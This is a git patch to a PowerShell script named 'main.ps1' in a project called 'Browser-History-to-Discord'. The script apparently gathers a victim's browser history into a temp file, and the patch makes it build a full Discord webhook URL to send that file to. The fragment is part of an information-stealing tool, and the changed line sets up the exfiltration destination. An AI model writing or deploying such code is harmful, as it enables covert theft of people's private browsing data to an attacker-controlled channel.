From a488914e0bc9fba98723af2a256461c883217c77 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 19 Jun 2025 16:39:03 +0000 Subject: [PATCH] Update main.ps1 --- Browser-History-to-Discord/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Browser-History-to-Discord/main.ps1 b/Browser-History-to-Discord/main.ps1 index 0d47273..37a2815 100644 --- a/Browser-History-to-Discord/main.ps1 +++ b/Browser-History-to-Discord/main.ps1 @@ -1,5 +1,5 @@  -$whuri = "$dc" +$whuri = ("https://discord.com/api/webhooks/" + "$dc") $outpath = "$env:temp\browser_history.txt" "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII